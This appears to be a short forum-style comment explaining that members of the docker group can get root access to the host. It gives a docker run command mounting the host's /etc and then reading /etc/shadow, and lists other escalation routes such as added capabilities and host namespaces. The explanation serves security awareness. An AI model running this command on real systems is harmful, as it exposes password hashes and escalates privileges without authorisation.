To see the issue, run this as a normal user that has permission to run docker commands (i.e. is member of the docker group):

docker run -it --rm -v/etc:/mnt/etc alpine:latest sh -c "apk add --no-cache bash && exec bash"
$ cat /mnt/etc/shadow

There are many ways of escalating privileges in docker, not just because containers by default run as root, but also the ability to set Linux capabilities (like SYS_ADMIN, NET_ADMIN, SYS_MODULE, etc), access to host namespaces and devices and more.